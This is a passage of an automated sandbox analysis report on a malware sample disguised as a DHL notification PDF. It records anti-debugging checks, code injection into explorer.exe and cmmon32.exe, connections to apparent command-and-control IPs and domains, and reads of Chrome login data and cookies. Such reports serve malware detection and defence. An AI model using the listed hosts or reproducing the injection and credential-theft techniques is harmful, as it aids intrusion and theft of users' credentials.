Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2766D mov eax, dword ptr fs:[00000030h] 3_2_00A2766D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A3AE73
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A3AE73
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A3AE73
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A3AE73
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A3AE73
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h] 3_2_00A27E41
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h] 3_2_00A27E41
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h] 3_2_00A27E41
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h] 3_2_00A27E41
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h] 3_2_00A27E41
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h] 3_2_00A27E41
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADAE44 mov eax, dword ptr fs:[00000030h] 3_2_00ADAE44
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADAE44 mov eax, dword ptr fs:[00000030h] 3_2_00ADAE44
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A28794 mov eax, dword ptr fs:[00000030h] 3_2_00A28794
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A97794 mov eax, dword ptr fs:[00000030h] 3_2_00A97794
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A97794 mov eax, dword ptr fs:[00000030h] 3_2_00A97794
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A97794 mov eax, dword ptr fs:[00000030h] 3_2_00A97794
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A537F5 mov eax, dword ptr fs:[00000030h] 3_2_00A537F5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A14F2E mov eax, dword ptr fs:[00000030h] 3_2_00A14F2E
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A14F2E mov eax, dword ptr fs:[00000030h] 3_2_00A14F2E
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4E730 mov eax, dword ptr fs:[00000030h] 3_2_00A4E730
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE070D mov eax, dword ptr fs:[00000030h] 3_2_00AE070D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE070D mov eax, dword ptr fs:[00000030h] 3_2_00AE070D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4A70E mov eax, dword ptr fs:[00000030h] 3_2_00A4A70E
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4A70E mov eax, dword ptr fs:[00000030h] 3_2_00A4A70E
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3F716 mov eax, dword ptr fs:[00000030h] 3_2_00A3F716
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAFF10 mov eax, dword ptr fs:[00000030h] 3_2_00AAFF10
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2FF60 mov eax, dword ptr fs:[00000030h] 3_2_00A2FF60
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE8F6A mov eax, dword ptr fs:[00000030h] 3_2_00AE8F6A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2EF40 mov eax, dword ptr fs:[00000030h] 3_2_00A2EF40
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0040CF43 LdrLoadDll, 3_2_0040CF43
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_004018F8 SetUnhandledExceptionFilter, 1_2_004018F8
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040636B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_00401BF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00401BF3
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_00401796 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00401796

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 198.46.160.97 80
Source: C:\Windows\explorer.exe Domain query: www.denko-kosan.com
Source: C:\Windows\explorer.exe Domain query: www.traindic.top
Source: C:\Windows\explorer.exe Network Connect: 1.13.186.125 80
Source: C:\Windows\explorer.exe Network Connect: 219.94.129.181 80
Source: C:\Windows\explorer.exe Network Connect: 162.0.231.77 80
Source: C:\Windows\explorer.exe Network Connect: 67.222.24.48 80
Source: C:\Windows\explorer.exe Network Connect: 49.212.180.95 80
Source: C:\Windows\explorer.exe Domain query: www.bohndigitaltech.com
Source: C:\Windows\explorer.exe Domain query: www.0dhy.xyz
Source: C:\Windows\explorer.exe Domain query: www.yongleproducts.com
Source: C:\Windows\explorer.exe Network Connect: 162.241.24.110 80
Source: C:\Windows\explorer.exe Domain query: www.rifleroofers.com
Source: C:\Windows\explorer.exe Domain query: www.kunimi.org
Source: C:\Windows\explorer.exe Domain query: www.amirah.cfd
Source: C:\Windows\explorer.exe Domain query: www.bisarropainting.com
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1200000
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\ldndbi.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Thread register set: target process: 3320
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3320
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process created: C:\Users\user\AppData\Local\Temp\ldndbi.exe C:\Users\user~1\AppData\Local\Temp\ldndbi.exe
Source: explorer.exe, 00000004.00000000.256600006.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.509821634.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000002.514810946.00000000056F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.263500910.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.256600006.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.256320918.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.256600006.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.509821634.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.256600006.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.509821634.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_00401A05 cpuid 1_2_00401A05
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_0040167D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_0040167D
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640

Stealing of Sensitive Information

Source: Yara match File source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Remote Access Functionality

Source: Yara match File source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY